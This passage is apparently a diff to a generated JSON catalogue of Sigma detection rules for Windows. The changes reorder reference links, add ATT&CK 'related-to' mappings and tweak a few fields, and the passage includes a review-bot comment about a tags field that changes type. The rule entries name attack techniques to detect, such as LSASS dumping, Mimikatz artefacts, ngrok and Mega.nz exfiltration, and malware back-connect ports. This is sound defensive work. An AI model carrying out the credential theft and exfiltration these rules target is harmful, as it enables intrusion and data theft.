"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://twitter.com/M_haggis/status/900741347035889665", "https://twitter.com/M_haggis/status/1032799638213066752", + "https://twitter.com/M_haggis/status/900741347035889665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" ], "tags": [ 
@@ -23208,6 +29320,22 @@ "attack.t1567.001" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", "value": "Microsoft Binary Github Communication" }, @@ -23276,9 +29404,9 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", "https://content.fireeye.com/apt-41/rpt-apt41", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" ], "tags": [ @@ -23287,6 +29415,22 @@ "attack.t1102.001" ] }, + "related": [ + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", "value": "Dead Drop Resolvers" }, @@ -23311,6 +29455,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", "value": "Script Initiated Connection to Non-Local Network" }, 
@@ -23350,8 +29503,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" ], "tags": [ @@ -23359,6 +29512,15 @@ "attack.t1218.001" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", "value": "HH.EXE Network Connections" }, @@ -23383,6 +29545,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", "value": "Wuauclt Network Connection" }, @@ -23408,6 +29579,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "value": "Rundll32 Internet Connection" }, 
@@ -23461,6 +29641,22 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", "value": "Regsvr32 Network Activity" }, @@ -23488,6 +29684,22 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", "value": "Remote PowerShell Session (Network)" }, @@ -23514,6 +29726,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "value": "Microsoft Sync Center Suspicious Network Connections" }, @@ -23542,6 +29763,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "value": "RDP to HTTP or HTTPS Target Ports" }, 
@@ -23568,6 +29798,15 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "value": "Excel Network Connections" }, @@ -23592,6 +29831,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", "value": "Certutil Initiated Connection" }, @@ -23608,8 +29856,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" ], "tags": [ @@ -23617,6 +29865,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9976fa64-2804-423c-8a5b-646ade840773", "value": "Suspicious Outbound SMTP Connections" }, 
@@ -23633,10 +29890,10 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://twitter.com/M_haggis/status/1032799638213066752", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://twitter.com/M_haggis/status/900741347035889665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" ], "tags": [ @@ -23644,6 +29901,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "value": "Microsoft Binary Suspicious Communication Endpoint" }, 
@@ -23675,6 +29941,43 @@ "attack.s0508" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", "value": "Communication To Ngrok Tunneling Service" }, @@ -23699,6 +30002,15 @@ "attack.t1571" ] }, + "related": [ + { + "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", "value": "Suspicious Typical Malware Back Connect Ports" }, @@ -23723,6 +30035,15 @@ "attack.t1127.001" ] }, + "related": [ + { + "dest-uuid": "c92e3d68-2349-49e4-a341-7edca2deff96", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "value": "Silenttrinity Stager Msbuild Activity" }, 
@@ -23770,6 +30091,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", "value": "Script Initiated Connection" }, @@ -23820,6 +30150,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", "value": "Suspicious Program Location with Network Connections" }, @@ -23847,6 +30186,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "value": "RDP Over Reverse SSH Tunnel" }, @@ -23863,8 +30211,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://ngrok.com/", + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" ], "tags": [ @@ -23872,6 +30220,15 @@ "attack.t1567.001" ] }, + "related": [ + { + "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18249279-932f-45e2-b37a-8925f2597670", "value": "Communication To Ngrok.Io" }, 
@@ -23888,8 +30245,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", + "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" ], "tags": [ @@ -23897,6 +30254,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", "value": "Download a File with IMEWDBLD.exe" }, @@ -23924,6 +30290,22 @@ "attack.t1559.001" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", "value": "Dllhost Internet Connection" }, @@ -23948,6 +30330,15 @@ "attack.t1218.003" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", "value": "Cmstp Making Network Connection" }, 
@@ -23964,8 +30355,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/",
  "https://twitter.com/forensicitguy/status/1513538712986079238",
+ "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml"
  ],
  "tags": [
@@ -23973,6 +30364,15 @@
  "attack.t1203"
  ]
  },
+ "related": [
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
  "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583",
  "value": "Equation Editor Network Connection"
  },
@@ -23989,8 +30389,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
  "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb",
+ "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml"
  ],
  "tags": "No established tags"
@@ -24011,8 +30411,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://megatools.megous.com/",
  "https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://megatools.megous.com/",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml"
  ],
  "tags": [
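Review bot: In the `@@ -23989,8 +30389,8 @@` hunk the `tags` field is the string `"No established tags"`, while every other entry in this chunk has `tags` as an array of `attack.*` strings, so the key changes type depending on whether the source rule carries tags. Any consumer that iterates `tags`, and the step that derives each entry's `related` block from its `attack.*` tags (this entry correctly gets none), has to special-case that sentinel. Emitting `"tags": []` or omitting the key when the rule has no tags keeps the shape uniform; since this file looks generated, the change belongs in the generator. The neighbouring hunks on this line are plain refs reorders and a routine `related` addition.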
@@ -24020,6 +30420,15 @@ "attack.t1567.001" ] }, + "related": [ + { + "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "value": "Communication To Mega.nz" }, @@ -24044,6 +30453,15 @@ "attack.t1496" ] }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", "value": "Windows Crypto Mining Pool Connections" }, @@ -24069,6 +30487,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", "value": "Msiexec Initiated Connection" }, @@ -24085,8 +30512,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", "https://adsecurity.org/?p=2398", + "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" ], "tags": [ @@ -24095,6 +30522,22 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", "value": "Suspicious Process Writes Ntds.dit" }, 
@@ -24111,8 +30554,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/binderlabs/DirCreate2System", "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" ], "tags": [ @@ -24137,11 +30580,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], "tags": [ @@ -24149,6 +30592,15 @@ "attack.t1036.007" ] }, + "related": [ + { + "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", "value": "Suspicious LNK Double Extension Files" }, 
@@ -24173,6 +30625,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "value": "Suspicious Creation TXT File in User Desktop" }, @@ -24242,6 +30703,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74", "value": "Unidentified Attacker November 2018 - File" }, @@ -24254,7 +30724,7 @@ "Legitimate use of the profile by developers or administrators" ], "filename": "file_event_win_susp_vscode_powershell_profile.yml", - "level": "high", + "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ @@ -24267,6 +30737,15 @@ "attack.t1546.013" ] }, + "related": [ + { + "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "value": "VsCode Powershell Profile Modification" }, 
@@ -24307,11 +30786,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://github.com/helpsystems/nanodump", - "https://www.google.com/search?q=procdump+lsass", "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://www.google.com/search?q=procdump+lsass", + "https://github.com/helpsystems/nanodump", + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" ], "tags": [ @@ -24319,6 +30798,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", "value": "LSASS Process Memory Dump Files" }, @@ -24344,6 +30832,15 @@ "cve.2021.26858" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "value": "CVE-2021-26858 Exchange Exploitation" }, @@ -24369,6 +30866,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "value": "Dumpert Process Dumper Default File" }, 
@@ -24395,6 +30901,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "value": "PsExec Service File Creation" }, @@ -24435,11 +30950,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], "tags": [ @@ -24447,6 +30962,15 @@ "attack.t1036.007" ] }, + "related": [ + { + "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "value": "Suspicious Double Extension Files" }, @@ -24519,6 +31043,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "value": "GoToAssist Temporary Installation Artefact" }, 
@@ -24590,6 +31123,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", "value": "Legitimate Application Dropped Executable" }, @@ -24635,6 +31177,15 @@ "attack.t1137.006" ] }, + "related": [ + { + "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "value": "Microsoft Office Add-In Loading" }, @@ -24644,7 +31195,7 @@ "author": "@ScoubiMtl", "creation_date": "2021/04/05", "falsepositive": [ - "User genuinly creates a VB Macro for their email" + "User genuinely creates a VB Macro for their email" ], "filename": "file_event_win_outlook_c2_macro_creation.yml", "level": "medium", @@ -24662,6 +31213,29 @@ "attack.t1546" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "value": "Outlook C2 Macro Creation" }, 
@@ -24678,8 +31252,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", + "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" ], "tags": [ @@ -24687,6 +31261,15 @@ "attack.t1564" ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74babdd6-a758-4549-9632-26535279e654", "value": "Suspicious Executable File Creation" }, @@ -24703,9 +31286,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/hhlxf/PrintNightmare", "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/afwu/PrintNightmare", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" ], "tags": [ @@ -24716,6 +31299,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern" }, @@ -24740,6 +31332,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", "value": "Mimikatz MemSSP Default Log File Creation" }, 
@@ -24782,8 +31383,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" ], "tags": [ @@ -24794,6 +31395,15 @@ "cve.2021.31979" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": 